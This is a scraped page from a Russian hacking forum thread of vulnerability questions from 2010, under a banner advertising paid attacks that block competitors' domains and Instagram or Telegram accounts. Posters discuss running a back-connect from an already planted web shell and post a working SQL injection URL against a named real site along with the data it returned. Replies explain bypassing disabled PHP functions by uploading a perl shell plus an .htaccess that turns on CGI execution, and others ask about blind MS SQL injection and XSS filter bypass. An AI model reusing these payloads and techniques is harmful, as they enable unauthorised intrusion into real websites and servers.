УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1502 из 2438

1502

Опции темы

Поиск в этой теме

Опции просмотра

#15011

07.09.2010, 20:23

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Отправить сообщение для Shadrin с помощью ICQ

есть веб шелл на сервере с

Код:

Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?

#15012

07.09.2010, 22:06

intNet

Познающий

Регистрация: 31.05.2009

Сообщений: 68

Провел на форуме:
1271980

Репутация: 19

Нашёл SQLInj:

Код:

Code:
http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15

Код:

Code:
version() 5.0.67-log
user() strob_admin@127.0.0.1
database() strob_product

Как теперь можно залить шелл(не через админку)?

Заранее спасибо, в этой теме 0 почти.

#15013

07.09.2010, 22:58

brutos

Новичок

Регистрация: 25.11.2009

Сообщений: 0

Провел на форуме:
68379

Репутация: 0

intNet, вот здесь посмотри:

https://rdot.org/forum/showthread.php?t=352

#15014

07.09.2010, 23:04

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

123

Цитата:

Сообщение от brutos

brutos said:
intNet
, вот здесь посмотри:
https://rdot.org/forum/showthread.php?t=352

мдя, brutos ну и где там все условия чтоб лить через иньецию?

нет 2-order inj, mg=on, прав нет у юзверя.

мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь?

Цитата:

Сообщение от Shadrin

Shadrin said:
есть веб шелл на сервере с

Код:

Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?

perl-скрипт

Цитата:

Сообщение от Shadrin

Shadrin said:
Strilo4ka
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?

/showthread.php?t=198119

Цитата:

Сообщение от None

brutos
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.

ок

Цитата:

Сообщение от p0deje

p0deje said:
Есть пассивная XSS вида

Код:

Code:
?file=

Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида

Код:

Code:

тут

тут

пашкеле медаль. )

#15015

07.09.2010, 23:17

brutos

Новичок

Регистрация: 25.11.2009

Сообщений: 0

Провел на форуме:
68379

Репутация: 0

Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.

#15016

08.09.2010, 11:57

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Strilo4kaкак я запущу перл скрипт если у меня фунции запуска в пхп отрублены?

#15017

08.09.2010, 13:59

DrakonHaSh

Познающий

Регистрация: 16.04.2008

Сообщений: 88

Провел на форуме:
264305

Репутация: 30

Отправить сообщение для DrakonHaSh с помощью ICQ

Цитата:

Сообщение от None

как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?

залить perl скрипт (а лучше perl шел), попробовать запустить его через web.

также нужно попробовать создать .htaccess

Options +ExecCGI

AddHandler cgi-script pl

у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.

#15018

08.09.2010, 19:07

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе)

И если только брутить то подскажите скрипт или программу для mssql

#15019

08.09.2010, 22:27

B1t.exe

Постоянный

Регистрация: 06.11.2006

Сообщений: 865

Провел на форуме:
1977708

Репутация: 208

Цитата:

Сообщение от Redwood

Redwood said:
Попробуй MaxPatrol, он фаззит mod_rewrite.
И в довесок почитай вот это: /thread228319.html

очень проблематично найти MaxPatrol.

может посоветуйте альтернативу ?

Acunetix Web Vulnerability Scanner 6 - пойдет?

Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..

#15020

08.09.2010, 23:50

B1t.exe

Постоянный

Регистрация: 06.11.2006

Сообщений: 865

Провел на форуме:
1977708

Репутация: 208

Цитата:

Сообщение от Redwood

Redwood said:
http://forum.web-defence.ru/showpost.php?p=2923&postcount=6

Спасибо за прогу.

выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит.

снял лог, а там только заголовки на всю страницу:

Код:

Code:
GET / HTTP/1.1
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host:site.aa.su

Скажу еще, что сайт попасть можно только лишь после авторизации.

Страница 1502 из 2438

1502

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход